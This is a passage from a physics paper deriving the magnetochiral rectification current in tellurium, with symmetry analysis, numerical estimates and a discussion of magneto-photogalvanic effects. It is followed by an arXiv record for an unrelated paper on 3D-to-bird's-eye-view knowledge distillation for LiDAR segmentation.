\[G_{zzzz}^{(v)}=-\frac{32\mathcal{A}_{1}^{2}ge^{3}\tau}{15\hbar^{3}}\bigg{(}\frac{\beta}{\Delta_{2}}\bigg{)}^{3}g_{2D}\frac{\partial[\kappa_{\mathrm{F}}^{5}\tau(\varepsilon_{\mathrm{F}})]}{\partial\varepsilon_{\mathrm{F}}}. \tag{52}\] Using the relations \(\kappa_{\mathrm{F}}\propto\varepsilon_{\mathrm{F}}^{1/2}\), \(\tau(\varepsilon_{\mathrm{F}})\propto\varepsilon_{\mathrm{F}}^{-1/2}\), \(\mathcal{A}_{1}\kappa_{\mathrm{F}}^{2}=\varepsilon_{\mathrm{F}}\), we arrive at \[G_{zzzz}^{(v)}=-\frac{8}{15}g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{2}\hbar^{3}}z^{3}\:. \tag{53}\] Next, we search for the correction \(f_{\mathbf{k}}^{(E^{2}B)}\). It is found from Eq. 
(39) to be as follows, see Eq. (50): \[f_{\mathbf{k}}^{(E^{2}B)}=gB_{z}\bigg{(}\frac{\beta k_{z}}{\Delta_{2}}\bigg{)}^{3}\frac{1}{2\kappa}\frac{\mathrm{d}\kappa}{\mathrm{d}\varepsilon_{\mathbf{k}}^{0}}f_{\mathbf{k}}^{(E^{2})}\;, \tag{54}\] where \(f_{\mathbf{k}}^{(E^{2})}\) is given by Eq. (51). This allows us to calculate the second contribution in Eq. (42): \[G_{zzzz}^{(E^{2}B)}=\frac{16}{105}g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{2}\hbar^{3}}z^{3}\,. \tag{55}\] Finally we calculate the contribution related to the function \(f_{\mathbf{k}}^{(EBE)}\). According to Eq. (41) this function has the form \[f_{\mathbf{k}}^{(EBE)}=-\tau\frac{eE_{z}}{\hbar}\frac{\partial f_{\mathbf{k}}^{(EB)}}{\partial k_{z}}\;. \tag{56}\] It allows us to rewrite the first contribution in Eq. (42) as \[j_{z}^{(EBE)}=2e^{2}E_{z}\bigg{(}\frac{2\mathcal{A}_{1}}{\hbar}\bigg{)}^{2}\sum_{\mathbf{k}}f_{\mathbf{k}}^{(EB)}\tau^{\prime}k_{z}^{2}\,. \tag{57}\] While deriving this equation we took into account that the function \(f_{\mathbf{k}}^{(EB)}\) satisfies Eq. (24). The solution of Eq. (40) for \(f_{\mathbf{k}}^{(EB)}\) reads \[f_{\mathbf{k}}^{(EB)}= \frac{gB_{z}eE_{z}\tau}{2\hbar}\bigg{(}\frac{\beta}{\Delta_{2}}\bigg{)}^{3}\bigg{[}3f_{0}^{\prime}\bigg{(}k_{z}^{2}-\frac{\kappa^{2}}{3}\bigg{)} \tag{58}\] \[\qquad+\mathcal{A}_{1}\bigg{(}2f_{0}^{\prime\prime}-\frac{f_{0}^{\prime}}{\varepsilon_{\mathbf{k}}^{0}}\bigg{)}\bigg{(}k_{z}^{4}-\frac{\kappa^{4}}{5}\bigg{)}\bigg{]}\;.\] Substitution of this expression into Eq. (57) leads to \[G_{zzzz}^{(EBE)}=-\frac{2}{105}g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{2}\hbar^{3}}z^{3}\;. \tag{59}\] The sum of the three contributions (52), (55) and (59) yields \[G_{zzzz}=-\frac{2}{5}g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{2}\hbar^{3}}z^{3}\;, \tag{60}\] where \(\tau\) is defined by Eq. (47). Comparing with the relaxation-time approximation result (45), we see a difference both in the sign and in the magnitude (a factor of \(2/5\)). ## VII Mechanism involving inelastic scattering Now we turn to the mechanism of magnetochiral current involving the inelastic scattering. Compared to the previous section we shift the attention from the asymmetric part of \(\delta f_{\mathbf{k}}\) satisfying condition (24) to the energy-dependent part \(\delta f(\varepsilon_{\mathbf{k}})\) of the correction to the hole distribution function. Assuming the hole-hole collisions to be more effective than the hole energy relaxation on acoustic phonons we can describe the energy-dependent sum \(f_{0}(\varepsilon_{\mathbf{k}})+\delta f(\varepsilon_{\mathbf{k}}^{0})\) as the Fermi-Dirac distribution function \(f_{0}(\varepsilon_{\mathbf{k}},T_{h})\) characterized by the hole temperature \(T_{h}\) different from the bath temperature \(T\). Here we first briefly describe the procedure to calculate \(T_{h}\) and then show how the inelastic relaxation of the hole nonequilibrium distribution \(f_{0}(\varepsilon_{\mathbf{k}},T_{h})\) gives rise to an electric current proportional to \((T_{h}-T)B_{z}\). ### Estimation of the hole effective temperature \(\propto E_{z}^{2}\) The effective temperature \(T_{h}\) can be found from the heat balance equation \[\sigma_{zz}E_{z}^{2}=\mathcal{J}\;. \tag{61}\] The left-hand side represents Joule heating produced by the passage of an electric current with \(\sigma_{zz}\) being the conductivity. 
The right-hand side describes the energy relaxation of the holes following acoustic-phonon scattering and has the form \[\mathcal{J}=\sum_{\mathbf{k}^{\prime}\mathbf{k}}\left(\varepsilon_{\mathbf{k}}-\varepsilon_{\mathbf{k}^{\prime}}\right)\left(W_{\mathbf{k}^{\prime},\mathbf{k}}^{\rm(ab)}-W_{\mathbf{k},\mathbf{k}^{\prime}}^{\rm(em)}\right)\,, \tag{62}\] where \(W_{\mathbf{k}^{\prime},\mathbf{k}}^{\rm(ab)}\), \(W_{\mathbf{k},\mathbf{k}^{\prime}}^{\rm(em)}\) are the hole scattering rates for phonon absorption and emission processes. Their difference is given by \[W_{\mathbf{k}^{\prime},\mathbf{k}}^{\rm(ab)}-W_{\mathbf{k},\mathbf{k}^{\prime}}^{\rm(em)}= \frac{2\pi}{\hbar}|M_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\delta(\varepsilon_{\mathbf{k}^{\prime}}-\varepsilon_{\mathbf{k}}-\hbar\Omega_{\mathbf{q}}) \tag{63}\] \[\times \left[(f_{\mathbf{k}}-f_{\mathbf{k}^{\prime}})N_{\mathbf{q}}-f_{\mathbf{k}^{\prime}}(1-f_{\mathbf{k}})\right]\,.\] Here \(\mathbf{q}=\mathbf{k}^{\prime}-\mathbf{k}\), \(\Omega_{\mathbf{q}}\) and \(N_{\mathbf{q}}\) are the phonon wave vector, frequency and occupation number \[N_{\mathbf{q}}=\frac{1}{\exp(\hbar\Omega_{\mathbf{q}}/k_{B}T)-1}\;,\] and \(M_{\mathbf{k}^{\prime}\mathbf{k}}\) is the scattering matrix element. For the energy-dependent distribution function \(f_{0}(\varepsilon_{\mathbf{k}},T_{h})\) the term in the brackets in Eq. (63) reduces to \[\frac{\mathrm{e}^{(\varepsilon-\varepsilon_{F})/k_{B}T_{h}}\left[\mathrm{e}^{(\varepsilon^{\prime}-\varepsilon)/k_{B}T_{h}}-\mathrm{e}^{(\varepsilon^{\prime}-\varepsilon)/k_{B}T}\right]}{(\mathrm{e}^{(\varepsilon-\varepsilon_{F})/k_{B}T_{h}}+1)(\mathrm{e}^{(\varepsilon-\varepsilon^{\prime})/k_{B}T_{h}}+1)(\mathrm{e}^{(\varepsilon^{\prime}-\varepsilon)/k_{B}T}-1)}\] \[\approx -\frac{T_{h}-T}{T}\frac{\hbar\Omega_{\mathbf{q}}/k_{B}T}{\mathrm{e}^{\hbar\Omega_{\mathbf{q}}/k_{B}T}-1}f_{0}(\varepsilon)\left[1-f_{0}(\varepsilon^{\prime})\right]\,,\] where \(\varepsilon=\varepsilon_{\mathbf{k}}^{0}\), \(\varepsilon^{\prime}=\varepsilon_{\mathbf{k}^{\prime}}^{0}\). For the degenerate statistics, \(\varepsilon_{F}\gg k_{B}T\), a reasonable estimation of \(\mathcal{J}\) in Eqs. (61), (62) is \[\mathcal{J}\sim\Delta\varepsilon\frac{T_{h}-T}{T}\frac{\rho(\varepsilon_{F})k_{B}T}{\tau_{\rm in}}=k_{B}(T_{h}-T)\frac{\rho(\varepsilon_{F})\Delta\varepsilon}{\tau_{\rm in}}\,, \tag{64}\] where \(\Delta\varepsilon=\min\left(\hbar\Omega_{k_{F}},k_{B}T\right)\), and \(\rho(\varepsilon)\) is the 3D density of states. The characteristic inelastic-scattering time \(\tau_{\rm in}\) is defined by \[\frac{1}{\tau_{\rm in}}=\frac{2\pi}{\hbar}\sum_{\mathbf{k}^{\prime}}|M_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\delta(\varepsilon_{\mathbf{k}^{\prime}}^{0}-\varepsilon_{\mathbf{k}}^{0}) \tag{65}\] for \(\varepsilon_{\mathbf{k}}^{0}=\varepsilon_{F}\). Equations (61) and (64) allow one to estimate the heating of the hole gas. ### Current driven by energy relaxation The energy-dependent nonequilibrium function \(f(\varepsilon_{\mathbf{k}},T_{h})\) makes no contribution to the current (9). However, an electric current appears due to the inelastic relaxation of this distribution to \(f(\varepsilon_{\mathbf{k}},T)\equiv f_{0}(\varepsilon_{\mathbf{k}})\). 
The current is given by \[\delta j_{z}=-e\sum_{\mathbf{k}}\tau v_{z}^{(0)}(k_{z})\mathcal{I}_{\mathbf{k}}^{(ne)} \{f\}\;, \tag{66}\] where the inelastic collision integral has the form \[\mathcal{I}_{\mathbf{k}}^{(ne)}\{f\}=\frac{2\pi}{\hbar}\sum_{\mathbf{k}^ {\prime}}|M_{\mathbf{k}^{\prime}\mathbf{k}}|^{2} \tag{67}\] \[\{\left[(f_{\mathbf{k}}-f_{\mathbf{k}^{\prime}})N_{\mathbf{q}}+f_{\mathbf{k}}(1- f_{\mathbf{k}^{\prime}})\right]\delta(\varepsilon_{\mathbf{k}^{\prime}}-\varepsilon_{ \mathbf{k}}+\hbar\Omega_{\mathbf{q}})\] \[+\left[(f_{\mathbf{k}}-f_{\mathbf{k}^{\prime}})N_{\mathbf{q}}-f_{\mathbf{k}^{ \prime}}(1-f_{\mathbf{k}})\right]\delta(\varepsilon_{\mathbf{k}^{\prime}}-\varepsilon_ {\mathbf{k}}-\hbar\Omega_{\mathbf{q}})\}\;,\] with \(f_{\mathbf{k}}=f_{0}(\varepsilon_{\mathbf{k}},T_{h})\) and \(\varepsilon_{\mathbf{k}}=\varepsilon_{\mathbf{k}}^{0}+\delta\varepsilon_{\mathbf{k}}\), see Eqs. (5) and (6). It is clear that the current is contributed by the odd-in-\(k_{z}\) part of \(\mathcal{I}_{\mathbf{k}}^{(ne)}\{f\}\). For simplicity we used the relaxation time approximation for deriving the antisymmetric component of the hole distribution function \(f_{\mathbf{k}}^{(2)}\) and get \(f_{\mathbf{k}}^{(2)}=-\tau\mathcal{I}_{\mathbf{k}}^{(ne)}\{f\}\). Substituting the collision integral into Eq. (66) we can reduce this equation to \[\delta j_{z}=-\frac{2\pi e\tau}{\hbar}\sum_{\mathbf{k},\mathbf{k}^{\prime }}|M_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\left[v_{z}^{(0)}(k_{z})-v_{z}^{(0)}(k_{z}^{ \prime})\right] \tag{68}\] \[\times\left[(f_{\mathbf{k}}-f_{\mathbf{k}^{\prime}})N_{\mathbf{q}}-f_{\mathbf{k}^ {\prime}}(1-f_{\mathbf{k}})\right]\delta(\varepsilon_{\mathbf{k}^{\prime}}-\varepsilon _{\mathbf{k}}-\hbar\Omega_{\mathbf{q}})\;.\] For an estimation of the current magnitude we simplify in the collision integral the dispersion (5) to \(\varepsilon_{\mathbf{k}}^{0}=\mathcal{A}k^{2}\) and take into account only the cubic term in the expansion of \(\delta\varepsilon(k_{z})\), see Eq. (48). Then the expressions in the sums (62) and (68) differ by the multipliers \((\varepsilon_{\mathbf{k}}-\varepsilon_{\mathbf{k}^{\prime}})\) and \[\frac{gB_{z}}{\varepsilon_{F}}\left[v_{z}^{(0)}(k_{z})\left( \frac{\beta k_{z}}{\Delta_{2}}\right)^{3}-v_{z}^{(0)}(k_{z}^{\prime})\left( \frac{\beta k_{z}^{\prime}}{\Delta_{2}}\right)^{3}\right]\] \[\sim\frac{gB_{z}}{\varepsilon_{F}}\left(\frac{\beta}{\Delta_{2}} \right)^{3}\frac{k^{2}}{\hbar}\left(\varepsilon_{\mathbf{k}}-\varepsilon_{\mathbf{k} ^{\prime}}\right)\;.\] It follows then that the current (68) can be estimated as \[\delta j_{z}\sim e\tau\frac{gB_{z}}{\varepsilon_{F}}\left(\frac{\beta}{\Delta_ {2}}\right)^{3}\frac{\kappa_{F}^{2}}{\hbar}\mathcal{J}\;.\] For the simplified energy dispersion the conductivity reads \[\sigma_{zz}\sim\frac{e^{2}\tau\varepsilon_{F}\kappa_{F}}{\hbar^{2}}\] and we finally obtain \[\delta j_{z}\sim g\frac{e^{3}\tau^{2}}{\hbar^{3}}\left(\frac{\beta\kappa_{F}}{ \Delta_{2}}\right)^{3}E_{z}^{2}B_{z}\,. \tag{69}\] One can see that the obtained estimation of the magnetochiral current for the second mechanism has the same order as the contribution (60). ## VIII Discussion We begin the discussion with a general symmetry analysis of the eMChA effect studied in this paper. Tellurium is a crystal with chiral (or enantiomorphic) structure. By definition, a chiral periodic solid (or molecule) is non-superimposable with its mirror image and has a "handedness". 
Two modifications of a chiral structure that are mirror-like to each other are called enantiomorphic. In tellurium crystals, the two mirror modifications are characterized by the space groups \(D_{3}^{4}\) (\(P3_{2}12\)) and \(D_{3}^{6}\) (\(P3_{2}21\)). Among 32 crystallographic point groups, 11 are enantiomorphic, namely, \(\mathcal{F}=C_{1},C_{2},D_{2},C_{4},D_{4},C_{3},D_{3}\) (quartz, tellurium), \(C_{6},D_{6},T\) and \(O\). In this regard, the question arises which of the coefficients \(G^{(n)}\) in Eqs. (2) coincide and which differ in sign for the two enantiomorphs. To answer this question, consider the achiral point group \(D_{3h}\), which differs from the \(D_{3}\) group by the presence of a symmetry plane \(\sigma_{h}\) and includes 12 operations \(g\in D_{3h}\). The \(D_{3h}\) symmetry allows nonzero terms in (2) with coefficients \(G^{(3)},G^{(8)}\) and \(G^{(10)}\). Consequently, these three coefficients describe an electric current nonlinear in \(\mathbf{E}\) and linear in \(\mathbf{B}\) with its sign independent of the enantiomorphic modification. The remaining seven coefficients \(G^{(n)}\) describe magnetochiral currents with opposite directions for the \(D_{3}^{4}\) and \(D_{3}^{6}\) phases. This way of separating the chiral and achiral contributions to the electric current is applicable for ten enantiomorphic crystal classes \(\mathcal{F}\), except for the \(O\) class. Each of them can be associated with an achiral point group \(\mathcal{F}_{a}\ni\mathcal{F}\), which has no spatial inversion center and which admits nonzero coefficients \(G_{ijkl}\) in Eq. (1). These coefficients describe achiral transport, whereas the additional coefficients arising in the \(\mathcal{F}\) group are chiral. Chiral and achiral nature of the coefficients can be readily determined from the behavior of physical quantities in the left and right parts of Eqs. (2) under reflection in the \(\sigma_{h}\) plane. Indeed, under this operation the component \(\delta j_{z}\) changes sign, but the product \(E_{1}^{2}B_{z}\) is invariant which means that the coefficient \(G^{(1)}\) is chiral. At the same time, the product \(E_{x}^{2}B_{y}\) changes sign upon reflection \(\sigma_{h}\), as does the component \(\delta j_{x}\). Therefore, the coefficient \(G^{(3)}\) describes achiral transport. Let us list the achiral groups corresponding to the above ten chiral groups: \(\mathcal{F}_{a}=C_{s},C_{2v},D_{2d},C_{4v},D_{4d},C_{3v},D_{3h},C_{6v},D_{6d}\) and \(T_{d}\). As another example, consider the chiral group \(T\) (silenite Bi\({}_{12}\)SiO\({}_{20}\), bismuth germanate Bi\({}_{12}\)GeO\({}_{20}\)) and the corresponding achiral group \(T_{d}\). The \(T_{d}\) symmetry allows for the current \(\delta j_{x}\) terms proportional to \((E_{y}^{2}-E_{z}^{2})B_{x}\) and \((E_{y}B_{y}-E_{z}B_{z})E_{x}\). In addition, the \(T\) group has chiral contributions proportional to \(|\mathbf{E}|^{2}B_{x},(\mathbf{E}\cdot\mathbf{B})E_{x}\) and \(E_{x}^{2}B_{x}\). The symmetry point transformation which can be used to divide between chiral and achiral coefficients is the reflection in the plane \(\sigma_{v}\parallel(110)\). As for the enantiomorphic group \(O\), it has no partner \(\mathcal{F}_{a}\ni O\) without an inversion center. Adding a reflection plane to the group \(O\) leads to the \(O_{h}\) group in which all the coefficients \(G_{ijkl}\) are equal to zero. Hence, for the \(O\) group, all the coefficients \(G_{ijkl}\) in the expansion (1) are chiral. 
Note that the BiTeI crystal has the achiral trigonal symmetry \(C_{3v}\) and allows a nonreciprocal rectification effect \(\delta j_{x}\propto E_{x}^{2}B_{y}\)[16], which however is not a magnetochiral effect. In Sections IV-VII, we have considered successively various models and mechanisms of the eMChA effect: the approximation of a constant relaxation time, the general procedure for calculating the magnetochiral current for different elastic and inelastic relaxation times, and the approximation of a small chiral parameter \(\beta\). A derivation of the exact expression for the current beyond the fixed relaxation time approximation cannot be obtained analytically and is outside the scope of this work. However, the carried-out study shows that the magneto-chiral current \(\delta j_{z}\) in tellurium for a degenerate hole gas can be described by \(\delta j_{z}=G_{zzzz}E_{z}^{2}B_{z}\) with \[G_{zzzz}=cg\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{ 2}\hbar^{3}}\left(\frac{\beta\kappa_{F}}{\Delta_{2}}\right)^{3}\,, \tag{70}\] where \(c\) is a factor of the order of unity. This means that the resistance of tellurium \(R\) has the nonreciprocal chiral contribution \[R=R_{0}(1+\gamma j_{z}B_{z}),\qquad\gamma=\frac{G_{zzzz}}{\sigma^{2}}, \tag{71}\] where \(R_{0}\) is the resistance in the absence of magnetic field, and \(\sigma\) is the conductivity. For an estimation we ignore the difference between \(\mathcal{A}_{1}\) and \(\mathcal{A}_{2}\). Taking the conductivity as \(\sigma=pe^{2}\tau/m^{*}\) where \(m^{*}=2\mathcal{A}_{1}/\hbar^{2}\), the coefficient \(g\) in Eq. (3) as \(g=g^{*}\mu_{\rm B}\), where \(\mu_{\rm B}\) is the Bohr magneton and \(g^{*}\) is the effective \(g\)-factor, and noting that the Fermi wavevector is related to the hole concentration as \(\kappa_{\rm F}^{3}=3\pi^{2}p\), we get \[\gamma\approx\frac{3\mu_{\rm B}{g^{*}m^{*}}^{2}}{ep}\bigg{(}\frac{\beta}{\hbar \Delta_{2}}\bigg{)}^{3}. \tag{72}\] We use the parameters suitable for Te: \(\beta=2.5\times 10^{-8}\) eV cm, \(\Delta_{2}=63\) meV, \(m^{*}=0.2m_{0}\), \(g^{*}=1\), and the hole concentration \(p=10^{16}\) cm\({}^{-3}\). Then we obtain that the ratio \(\beta\kappa_{\rm F}/\Delta_{2}\approx 0.27\ll 1\), and one can apply the approximate equation (70) for the estimation. The result yields \(3\times 10^{-7}\) cm\({}^{2}\) T\({}^{-1}\)A\({}^{-1}\) for the magneto-induced rectification coefficient \(\gamma\). The eMCh current measurements presented in Figs. 3 and 4 in Ref. [9] were performed in the following two geometries: (i) the electric current measured in the \(x\) direction at \(\mathbf{E}\parallel x\) and the magnetic field vector lying in the \((xy)\) plane, (ii) \(\mathbf{j},\mathbf{E}\parallel z\), and the magnetic field in the \((xz)\) plane. It follows from the general equations (2) that, in these two setups, one has \[\delta j_{x} =G_{xxxx}E_{x}^{2}B\sin\theta_{y}=(G^{(5)}+G^{(7)})E_{x}^{2}B\sin \theta_{y}\,, \tag{73}\] \[\delta j_{z} =G_{zzzz}E_{z}^{2}B\sin\theta_{x}=G^{(1)}E_{z}^{2}B\sin\theta_{x}\,, \tag{74}\] where \(B=|\mathbf{B}|\), \(\theta_{y}\) is the angle between the vector \(\mathbf{B}\) lying in the \((xy)\) plane and the \(y\) axis, \(\theta_{x}\) is the angle between the vector \(\mathbf{B}\) lying in the \((xz)\) plane and the \(x\) axis. According to Rikken and Avarvari [9] their measurements on tellurium show that \(3\gamma_{xxxx}\approx\gamma_{xxxy}\) and \(12\gamma_{zzzz}\approx\gamma_{xxxy}\), and \(\gamma_{zzzz}\ll\gamma_{zzxx}\). 
These results are in complete contradiction to the phenomenological equations (2), (73) and (74) derived for D\({}_{3}\) symmetry crystals. Indeed, the symmetry predicts that \(\gamma_{xxxy}=\gamma_{zzxx}=0\) while the component \(\gamma_{zzzz}\) is allowed. This is a key difficulty in comparing the derived theory with the experiment [9], and additional experimental work on chiral transport in tellurium crystals is needed. In Ref. [9], a theoretical estimate of the \(\gamma\) value is also given. The equation for \(\gamma\) is derived in the framework of a model where only the term linear in \(k_{z}B_{z}\) in the hole energy dispersion is taken into account. As stressed in Section IV this term does not lead to the eMChA and one needs to include the higher-order term \(k_{z}^{3}B_{z}\) in the hole Hamiltonian, as unambiguously follows from Eq. (14) for \(\delta j_{z}\). Moreover, the \(k_{z}B_{z}\)-linear term \(\delta\varepsilon_{\mathbf{k}}=\chi k_{z}B_{z}\) in the hole dispersion is given by \(\chi=-g\beta/\Delta_{2}\) with an estimate for tellurium \(|\chi|=3.7\times 10^{-32}\) J m/T. The value of \(|\chi|\) assumed in Ref. [9] is \(\sim 40\) times larger. So far, we have examined the effect of a static electric field \(\mathbf{E}\). It is easiest to generalize the theory to the case of a time-dependent field \(E_{z}(t)=E_{z}^{(0)}\cos\omega t\) in the constant relaxation-time approximation for frequencies satisfying the condition \(\omega\ll\varepsilon_{F}/\hbar\), while the product \(\omega\tau\) may be arbitrary. To find the distribution function \(f_{\mathbf{k}}(t)\), the derivative \(\partial f_{\mathbf{k}}/\partial t\) must be added to the left side of the kinetic equation (11). Omitting the calculations, we present the result: for \(\omega\neq 0\), the formula (14) becomes \[\delta j_{z}(\omega)=\frac{\delta j_{z}(0)}{1+\omega^{2}\tau^{2}}\,, \tag{75}\] where \(\delta j_{z}(0)\) is the magnetochiral current in a static electric field. The alternating electric field induces not only a dc current (75), but also a current at double frequency \(2\omega\). For the second harmonic generation we have \[j_{z}^{2\omega}(t)=j_{z;2\omega}\mathrm{e}^{-2\mathrm{i}\omega t}+j_{z;-2\omega}\mathrm{e}^{2\mathrm{i}\omega t}\:, \tag{76}\] where the complex amplitude is given by \[j_{z;2\omega}=j_{z;-2\omega}^{*}=\frac{1}{2}\frac{\delta j_{z}(0)}{(1-\mathrm{i}\omega\tau)(1-2\mathrm{i}\omega\tau)}\:.\] It should be mentioned that experimentally it is convenient to detect the magneto-chiral current by measuring the amplitude of the second harmonic at \(\omega\tau\ll 1\) [9]. In fact, Eq. (75) describes a particular case of the phenomenon called the magneto-photogalvanic effect (MPGE). In general, it is described by the following phenomenological equation [34; 35; 36; 37; 38] \[j_{i}=G_{ijkl}(\omega)\{E_{j}E_{k}^{*}\}B_{l}+G_{ilm}^{(\mathrm{circ})}R_{l}B_{m}\:, \tag{77}\] where \(\mathbf{E}\) is the complex amplitude of the radiation electric field and \[\{E_{j}E_{k}^{*}\}=\frac{1}{2}(E_{j}E_{k}^{*}+E_{j}^{*}E_{k})\:,\quad\mathbf{R}=\mathrm{i}(\mathbf{E}\times\mathbf{E}^{*})\:.\] The first and second contributions on the right-hand side of Eq. (77) represent the so-called linear and circular MPGE. At zero frequency (static electric field) the coefficients \(G_{ijkl}(\omega)\) coincide with the coefficients \(G_{ijkl}\) in Eq. (1). 
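Before turning to the circular contributions, it may help to make the numbers quoted above concrete. The short script below is a minimal numerical cross-check of the estimate following Eq. (72) with the Te parameters listed in the text, plus the frequency roll-off of Eq. (75); the scattering time \(\tau\) used for the roll-off is an assumed placeholder, not a measured value.

```python
import numpy as np

# Fundamental constants (SI) and the Te parameters quoted in the text.
e, hbar, m0, muB = 1.602e-19, 1.055e-34, 9.109e-31, 9.274e-24
beta   = 2.5e-8 * 1.602e-19 * 1e-2   # 2.5e-8 eV cm -> J m
Delta2 = 63e-3 * 1.602e-19           # 63 meV       -> J
mstar, gstar = 0.2 * m0, 1.0
p = 1e16 * 1e6                       # 1e16 cm^-3   -> m^-3

kF = (3 * np.pi**2 * p) ** (1 / 3)   # Fermi wavevector, kF^3 = 3 pi^2 p
print("beta*kF/Delta2 =", beta * kF / Delta2)        # ~0.26-0.27, as stated in the text

gamma = 3 * muB * gstar * mstar**2 / (e * p) * (beta / (hbar * Delta2)) ** 3   # Eq. (72)
print("gamma =", gamma * 1e4, "cm^2 T^-1 A^-1")      # ~3e-7, as stated

# Frequency roll-off of the rectified current, Eq. (75), for an assumed tau.
tau = 1e-13                                          # s, illustrative placeholder
for omega in (0.0, 1 / tau, 3 / tau):
    print("omega*tau =", omega * tau, " j(omega)/j(0) =", 1 / (1 + (omega * tau) ** 2))
```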
The electric field of the electromagnetic wave is complex and the magneto-photogalvanic current contains an additional contribution described by the pseudotensor \(\mathbf{G}^{(\mathrm{circ})}\) if the circular polarization of the exciting light is nonzero. The circular MPGE has first been observed in the achiral GaAs crystal [39]. Similarly to the dc effect (2) the coefficients \(G_{ijkl}(\omega)\) and \(\mathbf{G}^{(\mathrm{circ})}\) can be divided into chiral and achiral ones. Let us consider the products \(R_{i}B_{j}\) which transform in \(D_{3h}\) according to \((A_{2}^{\prime}+E^{\prime\prime})\times(A_{2}^{\prime}+E^{\prime\prime})=A_{1 }^{\prime}+2E^{\prime\prime}+(A_{1}^{\prime}+A_{2}^{\prime}+E^{\prime})\): \[R_{z}B_{z}\:(A_{1}^{\prime});\quad R_{x}B_{x}+R_{y}B_{y}\:(A_{1} ^{\prime}); \tag{78}\] \[R_{x}B_{y}-R_{y}B_{x}\:(A_{2}^{\prime});\] \[R_{x}B_{x}-R_{y}B_{y},-R_{x}B_{y}-R_{y}B_{x}\:(E^{\prime});\] \[R_{z}B_{y},-R_{z}B_{x}\:(E^{\prime\prime});\quad R_{y}B_{z},-R_{ x}B_{z}\:(E^{\prime\prime})\:.\] Thus, an achiral contribution to the current is given by \[\delta j_{x} =G_{1}^{(\mathrm{circ})}(R_{x}B_{x}-R_{y}B_{y})\:,\] \[\delta j_{y} =-G_{1}^{(\mathrm{circ})}(R_{x}B_{y}+R_{y}B_{x})\:.\] In the \(D_{3}\) symmetry, additional chiral terms appear \[\delta j_{x} =G_{2}^{(\mathrm{circ})}R_{z}B_{y}+G_{3}^{(\mathrm{circ})}R_{y}B _{z}\:, \tag{79}\] \[\delta j_{y} =-G_{2}^{(\mathrm{circ})}R_{z}B_{x}-G_{3}^{(\mathrm{circ})}R_{x} B_{z}\:,\] \[\delta j_{z} =G_{4}^{(\mathrm{circ})}(R_{x}B_{y}-R_{y}B_{x})\:.\] It is instructive to describe the hierarchical sequence of point-group categories: among 21 crystal classes lacking inversion symmetry, 18 are gyrotropic and, as mentioned above, 11 are enantiomorphic. All noncentrosymmetric crystals allow nonzero coefficients \(G_{ijkl}\) in Eq. (1) and \(G_{ijkl}(\omega),G_{klm}^{(\mathrm{circ})}\) in Eq. (77). We remind that the gyrotropic classes allow nonzero components of the rank 3 tensors \(\gamma_{ijk}\) antisymmetric under exchange of one pair of its indices or, equivalently, the rank 2 pseudotensors. In the gyrotropic crystals, there exist coefficients in Eq. (77) that relate the current vector components with pseudovector combinations of the products of \(E_{j}E_{k}^{*}B_{l}\) and describe the magneto-gyrotropic photogalvanic effects [35; 37; 40]. And finally, in the chiral crystals there are coefficients which have different signs for the different enantiomorphic modifications. Recently the magneto-chiral photogalvanic current \(\mathbf{j}\propto\mathbf{B}\times\mathbf{R}\) has been studied in bulk tellurium [41] in both terahertz and infrared ranges at indirect intraband and direct intersubband optical transitions in the valence band, respectively. ## IX Summary We have derived the theory of eMChA effect in tellurium which shows an intricate combination of chirality and magnetism. Macroscopic phenomenological relationship is established between the electric current density and products of the magnetic field and bilinear combinations of the electric field strength. Two microscopic mechanisms of the effect are considered, one with allowance for elastic scattering processes only and the other where the eMChA current is formed in the course of hole gas heating and its energy relaxation. In the purely elastic mechanism, the general formalism is developed to calculate the eMChA current at arbitrary ratio between the camel-back dispersion parameter \(\beta\), Fermi energy and valence-band splitting \(2\Delta_{2}\). 
The exact result is obtained in the limit of small \(\beta\). It yields the same order of magnitude for the magneto-induced rectification coefficient \(\gamma\) as the simple relaxation-time approximation; however, the value and even the sign of \(\gamma\) are different. Attention is drawn to the difference between the achiral and chiral contributions to the magneto-induced rectification which, respectively, coincide and are opposite in sign in the two enantiomorphic modifications of chiral crystals. The relationship between the eMChA and magneto-induced photogalvanic effects is discussed, and the chiral and achiral coefficients describing these effects in tellurium are identified. The developed theory of eMChA is compared with the available experimental data. ###### Acknowledgements. L. E. G. acknowledges support from the Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) Project No. Ga501/19-1. E. L. I. acknowledges support from the Russian Science Foundation (Project No. 22-12-00211).
2304.11393
Knowledge Distillation from 3D to Bird's-Eye-View for LiDAR Semantic Segmentation
LiDAR point cloud segmentation is one of the most fundamental tasks for autonomous driving scene understanding. However, it is difficult for existing models to achieve both high inference speed and accuracy simultaneously. For example, voxel-based methods perform well in accuracy, while Bird's-Eye-View (BEV)-based methods can achieve real-time inference. To overcome this issue, we develop an effective 3D-to-BEV knowledge distillation method that transfers rich knowledge from 3D voxel-based models to BEV-based models. Our framework mainly consists of two modules: the voxel-to-pillar distillation module and the label-weight distillation module. Voxel-to-pillar distillation distills sparse 3D features to BEV features for middle layers to make the BEV-based model aware of more structural and geometric information. Label-weight distillation helps the model pay more attention to regions with more height information. Finally, we conduct experiments on the SemanticKITTI dataset and Paris-Lille-3D. The results on SemanticKITTI show more than 5% improvement on the test set, especially for classes such as motorcycle and person, with more than 15% improvement. The code can be accessed at https://github.com/fengjiang5/Knowledge-Distillation-from-Cylinder3D-to-PolarNet.
Feng Jiang, Heng Gao, Shoumeng Qiu, Haiqiang Zhang, Ru Wan, Jian Pu
2023-04-22T13:03:19Z
http://arxiv.org/abs/2304.11393v1
